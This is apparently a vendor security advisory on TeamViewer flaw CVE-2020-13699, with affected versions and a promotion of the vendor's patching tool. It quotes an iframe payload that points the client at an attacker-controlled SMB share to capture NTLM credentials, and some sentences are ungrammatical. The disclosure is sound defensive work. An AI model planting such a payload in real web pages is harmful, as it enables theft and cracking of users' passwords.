The discovery of a high-risk vulnerability was in TeamViewer for Windows. It has a tracking as “CVE-2020-13699“, with a CVSS base score of “8.8,” in which exploits can happen by remote attacks to crack users’ passwords and, thereupon, lead to further system exploitation. Vulnerability Management Software is the solution for this problem.
TeamViewer is a software application for remote control, desktop sharing, online meetings, web conferencing, and file transfer between computers developed by the German company TeamViewer GmbH. TeamViewer is available for Microsoft Windows, Linux, macOS, Chrome OS, Android, iOS, Windows RT, Windows Phone 8, and BlackBerry operating systems. Accessing a system running TeamViewer with a web browser is also possible.
The recent increased remote connectivity software application usage due to the recent COVID-19 Pandemic work-from-home culture shift. To keep all the application safe remotely, a vulnerability management tool can be of great assistance.
(CVE-2020-13699) Vulnerability Details:
- CVE-2020-13699 is a security flaw that stems from an unquoted search path or element. Specifically, this vulnerability is due to the application not correctly quoting its custom URI handlers.
- A user with a vulnerable TeamViewer version is into visiting a maliciously craft website to exploit this vulnerability.
- According to Jeffrey Hofmann, a security engineer with Praetorian, who discovered and disclosed the vulnerability, “An attacker could embed a malicious iframe in a website with a crafted URL (iframe src=’teamviewer10: –play \\attacker-IP\share\fake.tvs’) that would launch the TeamViewer Windows desktop client and force it to open a remote SMB share.”
- Windows will perform NTLM authentication when opening the SMB share. Relaying of i.e., allows an attacker to capture an authentication and send it to another server, granting them the ability to perform operations on the remote server using the authenticated user’s privilege.
- Successful exploitation of this vulnerability could allow a remote attacker to launch TeamViewer with arbitrary parameters. The application could be forced to relay an NTLM authentication request to the attacker’s system enabling offline rainbow table attacks and brute force cracking attempts.
- These attacks could drive additional exploitation due to stolen credentials from successfully exploiting the vulnerability.
The Teamviewer vulnerability disclosure suggested that there is no evidence of this vulnerability exploitation.
According to CIS, the risk of exploitation is high for government institutions and mid-size companies. In the case of small business entities, the risk is medium and low for home users.
Impact
Exploiting the TeamViewer vulnerabilities could allow remote attackers to obtain sensitive credential information or take full control of the affected system.
Affected Products
TeamViewer Windows Desktop Application prior to 8.0.258861, 9.0.258860, 10.0.258873,11.0.258870, 12.0.258869, 13.2.36220, 14.2.56676, 14.7.48350, and 15.8.3.
Solution
TeamViewer has published a security update addressing CVE-2020-13699.
SanerNow security content to detect and mitigate this vulnerability is published. We strongly recommend applying the security update with our posted support article instructions.